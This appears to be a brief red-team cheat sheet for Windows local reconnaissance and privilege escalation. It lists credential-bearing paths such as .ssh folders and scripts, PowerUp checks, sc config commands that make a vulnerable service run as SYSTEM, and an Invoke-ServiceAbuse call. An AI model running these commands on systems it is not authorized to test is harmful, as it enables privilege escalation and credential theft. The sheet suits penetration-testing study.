Local Reconnaissance Windows
Local Enumeration
whoami /priv
Files and Directories
C:\program files\
C:\program files (x86)\
C:\users\bob\document
C:\users\bob\desktop
C:\users\bob\.ssh
C:\program Files\setup\mail.ps1
C:\inetpub\wwwroot\login.aspx (If web app uses MSSQL)
Local Session
Available tokens of other users/services
Vulnerable Service
ipmo .\powerup.ps1
invoke-allchecks
sc qc vuln
sc config vuln start demand //Change start type
sc config vuln obj "NT AUTHORITY\SYSTEM" //Change owner
Invoke-serviceabuse -name 'vuln' -username 'red\alice' //Abuse
Last updated